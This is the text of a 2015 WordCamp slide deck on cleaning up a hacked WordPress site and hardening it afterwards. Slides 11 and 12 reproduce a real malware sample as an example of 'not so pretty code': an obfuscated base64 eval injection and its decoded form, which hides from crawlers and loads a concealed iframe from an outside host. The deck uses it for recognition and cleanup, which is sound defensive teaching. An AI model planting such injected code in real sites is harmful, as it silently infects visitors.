Upgrade to Pro — share decks privately, control downloads, hide ads and more …

You Have Been Hacked? Now What?

You Have Been Hacked? Now What?

WordCamp San Diego 2015. Learn what you need to do once your website gets hacked and how not have it happen again.


Michele Butcher

March 28, 2015


  1. Your Site Has Been Hacked, Now What? Michele Butcher CantSpeakGeek.com

    WPSecurityLock.com @Michele_Butcher Slides can be found at: http://mlb.pw/WCSD2015 @Michele_Butcher
  2. WordPress Specialist at 
 WP Security Lock Head Geek at

 Speak Geek Sometimes a designer of pretty 
 websites and graphics Southern Illinois Meetup Co-Organizer Beginners and Intermediate WordPress 
 Instructor at John A Logan College Michele Butcher @Michele_Butcher
  3. It all starts one dreadful morning…… @Michele_Butcher

  4. First you see this @Michele_Butcher

  5. Then you realize this has happened @Michele_Butcher

  6. Which made you feel like this… @Michele_Butcher

  7. What do you do when your site gets hacked? @Michele_Butcher

  8. First option: Pay someone else to clean it. There are

    many options out there who will clean your site. Here is who I suggest. WP Security Lock https://wpsecuritylock.com Sucuri Security http://sucuri.net/ @Michele_Butcher Hack Repair http://hackrepair.com
  9. Second Option: Clean it yourself • Cheapest • Most time

    consuming • No one knows your site better than you do • You just have to know what to look for I do not suggest this if you are not comfortable reading HTML, PHP, and CSS. @Michele_Butcher
  10. Pretty Code @Michele_Butcher

  11. Not So Pretty Code <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX 2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJy wnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd 3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50Jywn YnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ld

    HNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZH J1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmV zaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGkn KTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1N SIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIi wgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJ yYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQu MjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguM TA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS 4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzM uMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4 LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44O C4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYX koIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU 1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwi NzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3M i4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCS k7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQp mb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxv bmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfa XAybG9uZyA +PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0K Zm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWR VJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn 0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB 4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3 WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY +JzsNCn0=')); @Michele_Butcher
  12. <?php error_reporting(0); $bot = FALSE ; $user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blog pulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.

    de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image- resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api'); $stop_ips_masks = array( array("",""), array("" ,"" ), array("", ""), array("",""), array("", ""), array("", ""), array("",""), array("",""), array("",""), array("",""), array("",""), array("",""), array("",""), array("",""), array("",""), array("",""), array("",""), array("",""), array("",""), array("",""), array("",""), array("","") ); $my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR'])); foreach ( $stop_ips_masks as $IPs ) { $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1])); if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;} } foreach ($user_agent_to_filter as $bot_sign){ if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;} } if (!$bot) { echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://lzqqarkl.co.cc/ QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==" width="2" height="2"></iframe></div>'; } @Michele_Butcher
  13. When cleaning your site, add clean copies of core, your

    theme and your plugins. It makes cleaning so much easier. @Michele_Butcher
  14. This is a good time to make an audit of

    everything on your site and delete what is not being used. You can always add other themes and plugins back later when you need it. @Michele_Butcher
  15. Now you have all the malware removed, that does not

    mean we are done @Michele_Butcher
  16. Change the salts in your wp-config.php file @Michele_Butcher

  17. Check your users! • You could have unwanted users •

    Delete the unwanted guests immediately • if you use “admin” as a username, delete it and make a new user name • Delete all users that are no longer using your dashboard (Old devs, designers, guests) • Only give others the access they need, not what they want. A guest blogger should never be an admin, only a contributor. @Michele_Butcher
  18. Check your FTP accounts on your server You could have

    unwanted users here as well @Michele_Butcher
  19. Check your File Permissions Files should be 644 Directories should

    be 755 @Michele_Butcher
  20. Add some Security to your site • iThemes Security or

    iThemes Security Pro • Jetpack (BruteProtect and VaultPress) • WordFence • Sucuri Firewall Some trusted plugins @Michele_Butcher
  21. Change your login information • WordPress Logins and passwords •

    cPanel Logins and passwords • Database logins and passwords
 (Remember to change them in your wp-config.php) • Hosting Logins and passwords @Michele_Butcher
  22. When it comes to usernames and passwords, here are a

    few tips. • NEVER use “admin” as a username and “password”as the password. NEVER on anything! • The harder a password is to remember, the harder is to hack • Use something like LastPass, 1Password, or KeyPass to store your passwords @Michele_Butcher
  23. What do you do to not get hacked again? @Michele_Butcher

  24. First and most important! UPDATE
 UPDATE Update core, update

    plugins, update themes! @Michele_Butcher
  25. A note on updating If you use a theme and/or

    plugin that was purchased from Envato, Theme Forest, or Code Canyon please mark the box under each purchased item on the download page to be notified by email of updates. That is the only way they notify their customers of updates. This is part of the reason the RevSlider Soak Soak infection was so high. @Michele_Butcher
  26. Pay attention to WordPress news and security sites • WP

    Tavern • WP Security Bloggers • Sucuri Blog • WP Security Lock • Advanced WordPress (Facebook) • Twitter @Michele_Butcher
  27. Only use trusted and supported themes and plugins Do NOT

    use a theme or plugin • That has not been updated in more than a year • No one is responding in the support forums • If it shows that it does not work in the current version of core @Michele_Butcher
  28. Start Making Backups • Backup Buddy • BackWPUp • VaultPress

    (Jetpack) • Check with your hosting company to see if they do backups as well • iThemes Security (free and Pro) will do database backups @Michele_Butcher
  29. Speaking of backups… Save them somewhere other than your server.

    Most have options to send them to an Amazon S3 account, Dropbox, email, or download to your machine. @Michele_Butcher
  30. Lastly, be active with your site. You know your site

    best. If something does not feel right, look into it. Also, do not ignore your website. No one likes a zombie website. @Michele_Butcher
  31. And remember… @Michele_Butcher

  32. Don’t Let Security Make You This Guy! @Michele_Butcher

  33. Questions? @Michele_Butcher

  34. Thank you! Michele Butcher http://CantSpeakGeek.com https:WPSecurityLock.com @Michele_Butcher Slides can be

    found at: http://mlb.pw/WCSD2015 @Michele_Butcher